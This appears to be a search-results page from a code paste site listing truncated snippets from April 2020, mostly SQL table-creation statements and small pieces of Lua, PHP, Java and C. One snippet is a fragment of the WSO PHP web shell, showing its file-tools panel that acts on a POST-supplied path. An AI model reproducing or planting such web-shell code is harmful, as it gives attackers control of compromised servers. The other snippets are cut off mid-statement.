42.7K results in 743 ms
5 years ago · Apr 07, 2020, 07:18 AM
BEGIN -- DROP TABLE dbo.[TestResults]; CREATE TABLE dbo.[TestResults] ( [TestResultsID] INT NOT NULL IDENTITY(1, 1) CONSTRAINT
5 years ago · Apr 07, 2020, 07:02 AM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; wsoFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
5 years ago · Apr 06, 2020, 10:24 PM
do local str = util.NetworkIDToString(i) if not str then return false
5 years ago · Apr 06, 2020, 07:24 PM
NAMES utf8mb4 */; -- -- Database: `Brain` -- CREATE DATABASE IF NOT EXISTS `Brain` DEFAULT CHARACTER SET
5 years ago · Apr 06, 2020, 07:14 PM
CREATE TABLE IF NOT EXISTS orders ( id BIGSERIAL PRIMARY
5 years ago · Apr 06, 2020, 05:10 PM
create_songs_table_query = """ CREATE TABLE IF NOT EXISTS songs ( song_id integer PRIMARY
5 years ago · Apr 06, 2020, 03:48 PM
FOR LOOP /* DROP TABLE IF EXISTS `greward`; CREATE TABLE `greward` ( `id` INT(11) UNSIGNED NOT NULL AUTO_INCREMENT, `gduniqueid` VARCHAR(100)
5 years ago · Apr 06, 2020, 01:56 PM
CREATE TABLE IF NOT EXISTS vendors ( id BIGSERIAL PRIMARY
5 years ago · Apr 06, 2020, 01:52 PM
CREATE TABLE IF NOT EXISTS vendors ( id BIGSERIAL PRIMARY
5 years ago · Apr 05, 2020, 10:10 PM
timezone_string' ); if ( empty( $tzstring ) ) { // Create a UTC+- zone if no timezone string exists if ( 0 == $current_offset ) $tzstring
5 years ago · Apr 05, 2020, 08:30 PM
console.log("Opened"); // seccussfull opened SQLite.run( `CREATE TABLE IF NOT EXISTS linkSysteme (code TEXT, id
5 years ago · Apr 05, 2020, 07:30 PM
pgdir_walk as suggested and create a pgdir if does not exist. pte_t *mypte = pgdir_walk(pgdir,
5 years ago · Apr 05, 2020, 12:36 PM
pgdir_walk as suggested and create a pgdir if does not exist. pte_t *mypte = pgdir_walk(pgdir,
5 years ago · Apr 05, 2020, 09:48 AM
work properly. AllowedVIPs = { -- "vip", }, -- If this table exists and is not empty, players that do
5 years ago · Apr 05, 2020, 12:06 AM
test.db', location: 'default'}); db.sqlBatch([ 'CREATE TABLE IF NOT EXISTS storeToken (tokenManterConectadoMeuVivoFixo)', [ 'INSERT INTO
5 years ago · Apr 04, 2020, 05:04 PM
START_GUID_ITEMS := 1; DROP TABLE IF EXISTS `tmp_item_instance_table`; CREATE TABLE `tmp_item_instance_table` ( `guid_new` INT(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY,
5 years ago · Apr 04, 2020, 12:48 PM
opt/cloudera/parcels/CDH/lib/hive/lib/hive-serde.jar; add jar /opt/cloudera/parcels/CDH/lib/hive/lib/json-serde-1.3.8-jar-with-dependencies.jar; CREATE DATABASE IF NOT EXISTS rodindm_kkt LOCATION '/user/hob2020051/task2'; USE
5 years ago · Apr 04, 2020, 11:26 AM
return true if param exists, otherwise false end if not (givenValue or toRet) or
5 years ago · Apr 04, 2020, 09:50 AM
private final String playersTable = "CREATE TABLE IF NOT EXISTS `acs_players`(" + "`name` varchar(16)," + "`seeds`
5 years ago · Apr 03, 2020, 07:50 PM
public void InitDB() { cmd.CommandText = "CREATE TABLE IF NOT EXISTS restaurants(id SERIAL PRIMARY KEY
Total pages: 2134